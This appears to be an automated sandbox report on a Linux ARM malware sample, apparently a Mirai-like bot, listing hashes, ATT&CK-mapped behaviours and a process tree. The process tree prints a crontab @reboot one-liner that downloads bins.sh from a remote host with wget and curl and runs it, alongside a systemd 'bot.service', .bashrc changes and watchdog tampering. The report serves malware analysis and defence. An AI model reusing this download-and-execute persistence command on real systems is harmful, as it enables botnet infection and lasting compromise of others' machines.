Analysis
-
max time kernel
149s -
max time network
147s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
11/10/2024, 02:08
Static task
static1
Behavioral task
behavioral1
Sample
ba3f176f6f168a4ef496592e1243c78dcaea1422a9d89d75e3b11d0c45fd290a.elf
Resource
debian9-armhf-20240729-en
General
-
Target
ba3f176f6f168a4ef496592e1243c78dcaea1422a9d89d75e3b11d0c45fd290a.elf
-
Size
76KB
-
MD5
0bbc673a23d323061c36a37fe5c3d509
-
SHA1
38f0a56d732c509f9bfb51d5fe6002619f6a6c7a
-
SHA256
ba3f176f6f168a4ef496592e1243c78dcaea1422a9d89d75e3b11d0c45fd290a
-
SHA512
1037513661209ed70d9932ef8479b1b59850d215c5c1105f93212f7961441739860b887c8ad94c085912dcaed2cd0e9ecb3c8a0b21baf8f7b975546dbc6722a8
-
SSDEEP
1536:lxu6Nt3LUDmK+Y104tBrDu/XyYp41N/DAzdLvNs/:lk6N9LUxtB3UZp4n8tNs/
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 657 sh 663 chmod 668 chmod -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog ba3f176f6f168a4ef496592e1243c78dcaea1422a9d89d75e3b11d0c45fd290a.elf File opened for modification /dev/misc/watchdog ba3f176f6f168a4ef496592e1243c78dcaea1422a9d89d75e3b11d0c45fd290a.elf -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.ikoZ1g crontab -
Creates/modifies environment variables 1 TTPs 1 IoCs
Creating/modifying environment variables is a common persistence mechanism.
description ioc Process File opened for modification /root/.bashrc ba3f176f6f168a4ef496592e1243c78dcaea1422a9d89d75e3b11d0c45fd290a.elf -
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp ba3f176f6f168a4ef496592e1243c78dcaea1422a9d89d75e3b11d0c45fd290a.elf -
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /lib/systemd/system/bot.service ba3f176f6f168a4ef496592e1243c78dcaea1422a9d89d75e3b11d0c45fd290a.elf -
Modifies Bash startup script 2 TTPs 1 IoCs
description ioc Process File opened for modification /root/.bashrc ba3f176f6f168a4ef496592e1243c78dcaea1422a9d89d75e3b11d0c45fd290a.elf -
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself /var/Sofia 648 ba3f176f6f168a4ef496592e1243c78dcaea1422a9d89d75e3b11d0c45fd290a.elf -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp ba3f176f6f168a4ef496592e1243c78dcaea1422a9d89d75e3b11d0c45fd290a.elf -
Enumerates kernel/hardware configuration 1 TTPs 1 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
description ioc Process File opened for reading /proc/filesystems crontab File opened for reading /proc/filesystems systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/filesystems crontab -
System Network Configuration Discovery 1 TTPs 1 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 667 curl
Processes
-
/tmp/ba3f176f6f168a4ef496592e1243c78dcaea1422a9d89d75e3b11d0c45fd290a.elf/tmp/ba3f176f6f168a4ef496592e1243c78dcaea1422a9d89d75e3b11d0c45fd290a.elf1⤵
- Modifies Watchdog functionality
- Creates/modifies environment variables
- Enumerates active TCP sockets
- Modifies systemd
- Modifies Bash startup script
- Changes its process name
- Reads system network configuration
PID:648 -
/bin/shsh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"2⤵
- File and Directory Permissions Modification
PID:657 -
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:659
-
-
/usr/bin/crontabcrontab -l3⤵
- Reads runtime system information
PID:660
-
-
/bin/chmodchmod +x bins.sh3⤵
- File and Directory Permissions Modification
PID:663
-
-
/bin/shsh bins.sh3⤵PID:665
-
-
/bin/curl/bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh3⤵
- System Network Configuration Discovery
PID:667
-
-
/bin/chmodchmod +x bins.sh3⤵
- File and Directory Permissions Modification
PID:668
-
-
/bin/shsh bins.sh3⤵PID:658
-
-
-
/bin/shsh -c "/bin/systemctl enable bot"2⤵PID:673
-
/bin/systemctl/bin/systemctl enable bot3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:674
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2XDG Autostart Entries
1Create or Modify System Process
1Systemd Service
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Scheduled Task/Job
1Cron
1Privilege Escalation
Boot or Logon Autostart Execution
2XDG Autostart Entries
1Create or Modify System Process
1Systemd Service
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Scheduled Task/Job
1Cron
1Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
356B
MD5f03c70cd4c61a1852f9e19b8fb0d639c
SHA1a6c078ffffdf05c4c47b273b24e6b3ff4ef7e008
SHA256ae50a3052a395987a2779deb9253d4aa8638f2f8b1cda7df9039388f21be7a90
SHA5126277fbbffcdd72fc3712721525538ac07fc46d290ebb02be34cef52b3e62bfa8a66f4e834d364d220108c815192e391ad986f05662fcbfae674417507f4bcc20
-
Filesize
235B
MD5f66259049e77e016213c05613e7bd249
SHA18cfa3c99058059df6e1b461d9a72562562da8436
SHA256606f9c8cab193f4bf6275e55242ec7b1b33f0d3097ca110d232fffa7ba3edde9
SHA5128a86630ac05b222c203abcc6eae50cabbde9ca31121301df15140b8e77cfb5e088249dc3810430c257cb410ea630c26faa72ef199760db076506cdd04d86018a